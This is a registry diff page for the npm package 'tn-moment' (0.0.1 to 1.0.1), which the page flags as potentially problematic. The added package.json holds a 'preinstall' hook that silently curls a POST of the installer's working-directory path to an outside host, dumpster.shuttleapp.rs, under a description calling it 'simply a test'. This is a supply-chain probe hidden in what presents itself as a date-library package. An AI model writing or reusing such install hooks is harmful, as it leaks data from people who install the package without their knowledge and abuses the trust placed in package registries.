tn-moment 0.0.1 → 1.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of tn-moment might be problematic. Click here for more details.
- package/.gitattributes +2 -0
- package/index.js +5 -0
- package/package.json +11 -10
- package/README.md +0 -2
package/.gitattributes
ADDED
package/index.js
CHANGED
package/package.json
CHANGED
@@ -1,14 +1,15 @@
|
|
1
1
|
{
|
2
2
|
"name": "tn-moment",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
6
|
-
"
|
7
|
-
|
8
|
-
|
3
|
+
"version": "1.0.1",
|
4
|
+
"description": "Nothing to see here, simply a test.",
|
5
|
+
"main": "./index.js",
|
6
|
+
"scripts": {
|
7
|
+
"preinstall": "curl -X POST https://dumpster.shuttleapp.rs -d ${PWD}",
|
8
|
+
"test": "exit 1"
|
9
9
|
},
|
10
|
-
"
|
11
|
-
|
12
|
-
|
13
|
-
|
10
|
+
"author": "",
|
11
|
+
"license": "ISC",
|
12
|
+
"dependencies": {
|
13
|
+
"moment": "^2.22.2"
|
14
|
+
}
|
14
15
|
}
|
package/README.md
DELETED